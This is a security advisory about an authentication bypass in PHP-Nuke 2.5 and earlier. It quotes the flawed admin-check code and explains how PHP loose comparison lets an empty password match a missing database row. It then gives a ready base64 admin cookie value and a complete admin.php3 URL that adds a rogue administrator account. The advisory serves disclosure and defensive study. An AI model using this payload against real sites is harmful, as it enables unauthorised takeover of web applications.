|
Brought to you by:
Suppliers of:
|
|
|
| |
| Security vulnerability in PHP-Nuke, a news site administration package, allows remote attacker to gain administrative access to the application. PHP-Nuke is open source, and freely downloaded at: http://phpnuke.org |
| |
Credit:
This information was provided by Fabian Clone.
|
| |
Vulnerable systems:
PHP-Nuke 2.5 or lower
Let's take a look at how PHP-Nuke authenticates administrative accounts.
In auth.inc.php3, line 31:
$admintest = 0;
if(isset($admin)) {
if(!IsSet($mainfile)) { include("mainfile.php3"); }
$admin = base64_decode($admin);
$admin = explode(":", $admin);
$aid = "$admin[0]";
$pwd = "$admin[1]";
dbconnect();
$result=mysql_query("select pwd from authors where aid='$aid'");
if(!$result) {
echo "Selection from database failed!";
exit;
} else {
list($pass)=mysql_fetch_row($result);
if($pass == $pwd) {
$admintest = 1;
}
}
}
Here some checks are done for the $admin value. Since any variables, either from cookies or forms (GET/POST) will be automatically made global to the script by PHP, we may put our own $admin value to the URL. If $pwd (an element of that "scrambled" $admin) does not match the value that corresponds to the fetched row, the false authentication ($admintest = 0) is returned, otherwise we'll be able to access any function in admin.php3. Sounds normal, until you continue to read the following exploit.
Exploit:
The theory is simply to make $pass == $pwd. As we see, the $pass value returned from mysql_fetch_row() could be anything, or could be FALSE if there are no more rows. So how about making $pwd (string-type) and $pass (logical-type) equally false? Yep, it satisfies the condition. The expression "if($pass == $pwd)" only compares values, NOT the type. So setting $pwd = "" (null) will be EQUAL (though not identical) to the given FALSE value of $pass.
The next part is much simpler. Putting any string value NOT listed in the authors database into the $aid will do for us. It gives the TRUE value of mysql_query() and makes mysql_fetch_row() FALSE.
For example, crafting our $admin value:
$aid = "blabla"; $pwd = "";
$admin = base64_encode("$aid:$pwd");
Will give us "YmxhYmxhOg==". Using this value, we're now able to access all functions in admin.php3. The following URL will add the account "godbless:indonesia" into the authors database:
http://www.example.com/admin.php3? admin=YmxhYmxhOg%3D%3D&op= AddAuthor&add_aid=godbless&add_name= Godbless&add_pwd=indonesia&add_url=&add_email=fake@mail.me
Looking at the options, administrator can edit users, articles, topics, banners, authors, etc.
|
|
|
|
|
